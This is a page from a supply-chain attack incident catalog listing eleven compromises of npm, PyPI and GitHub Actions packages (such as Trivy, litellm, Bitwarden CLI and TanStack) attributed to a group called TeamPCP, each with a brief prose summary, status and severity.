Skip to content
supplychainattack.orgSupply chain attack incident catalog

TeamPCP supply chain incidents

Group linked in public reporting to the Mini Shai-Hulud npm campaigns and related PyPI package compromises, reusing self-spreading credential-stealing payloads.

Also tracked as: Team PCP, PCP

11 confirmed incidents publicly associated with this group. Attribution reflects what the cited sources state; it is recorded for filtering, not asserted by this site.

  1. resolvedhigh

    durabletask: TeamPCP's Latest PyPi Compromise

    Malicious versions of the PyPI package durabletask were published, attributed to the TeamPCP threat actor. The attack matches known TeamPCP tactics used in prior supply chain compromises.

    TeamPCPPyPICompromised package
  2. activecritical

    The Worm That Keeps on Digging: TeamPCP Hits @antv in Latest Wave

    TeamPCP conducted a multi-ecosystem supply chain compromise targeting the @antv package and associated development infrastructure. The attack leveraged GitHub, NPM, and VSCode to steal credentials and establish persistence mechanisms.

    TeamPCPnpmOtherAccount takeoverCompromised packageMalicious maintainer
  3. containedcritical

    Microsoft's durabletask PyPI Package Compromised in Supply Chain Attack

    Three malicious versions of Microsoft's durabletask Python package were published to PyPI on May 19, 2026, containing a 28 KB payload that steals credentials from cloud providers (AWS, Azure, GCP), Kubernetes, password managers, and developer tools. The attack has been attributed to the TeamPCP threat group and exhibits indicators of Eastern European cybercrime operations.

    TeamPCPPyPICompromised package
  4. activecritical

    TeamPCP's Mini Shai-Hulud Is Back: A Self-Spreading Supply Chain Attack Compromises TanStack npm Packages

    The Mini Shai-Hulud worm is actively compromising legitimate npm packages by hijacking CI/CD pipelines and stealing developer secrets. The attack was first detected by StepSecurity in official @tanstack packages and is spreading across the npm ecosystem in real time.

    TeamPCPMini Shai HuludnpmOtherCompromised packageBuild-system compromise
  5. containedcritical

    TeamPCP Injects Two-Stage Credential Stealer into xinference PyPI Package

    The xinference package on PyPI was compromised with a two-stage credential stealer attributed to the TeamPCP threat actor. The malicious code was injected into the package, potentially affecting users who installed compromised versions.

    TeamPCPPyPICompromised packageMalicious maintainer
  6. containedcritical

    Bitwarden CLI Hijacked on npm: Bun-Staged Credential Stealer Targets Developers, GitHub Actions, and AI Tools

    @bitwarden/cli@2026.4.0 was compromised on npm with a malicious preinstall hook that deployed an obfuscated credential stealer. The malware harvests developer secrets, GitHub Actions tokens, and AI tool configurations, exfiltrating encrypted data to a Checkmarx-impersonating domain.

    Shai-HuludTeamPCPnpmCompromised package
  7. containedhigh

    10 Layers Deep: How StepSecurity Stops TeamPCP's Trivy Supply Chain Attack on GitHub Actions

    TeamPCP compromised 76 Trivy version tags on GitHub Actions in an overnight attack, followed by a similar KICS compromise using the same methodology. The attacks targeted credential exfiltration through malicious GitHub Actions.

    TeamPCPOtherContainer registryCompromised packageAccount takeover
  8. containedcritical

    TeamPCP Plants WAV Steganography Credential Stealer in telnyx PyPI Package

    On March 27, 2026, TeamPCP injected a WAV steganography-based credential stealer into two releases of the telnyx Python SDK on PyPI. The group was identified by shared cryptographic signatures and exfiltration methods matching their earlier litellm compromise.

    TeamPCPPyPICompromised package
  9. containedcritical

    litellm: Credential Stealer Hidden in PyPI Wheel

    A critical supply chain compromise in litellm==1.82.8 on PyPI was identified on March 24, 2026. The malicious PyPI wheel contains a credential stealer hidden in a litellm_init.pth file that executes during package initialization.

    TeamPCPPyPICompromised package
  10. containedhigh

    KICS GitHub Action Compromised: TeamPCP Strikes Again in Supply Chain Attack

    The KICS GitHub Action maintained by Checkmarx was compromised by the TeamPCP threat actor on March 23, 2026, with 35 tags hijacked between 12:58–16:50 UTC. The attack was credential-stealing in nature, targeting users of the GitHub Action in their CI/CD workflows.

    TeamPCPOtherAccount takeover
  11. containedcritical

    Trivy Compromised: Everything You Need to Know about the Latest Supply Chain Attack

    On March 19, 2026, threat actors attributed to "TeamPCP" injected credential-stealing malware into Aqua Security's Trivy scanner and related GitHub Actions. The compromise affected the supply chain of a widely-used container security tool, potentially exposing credentials and secrets in CI/CD environments.

    TeamPCPContainer registryOtherCompromised packageMalicious commit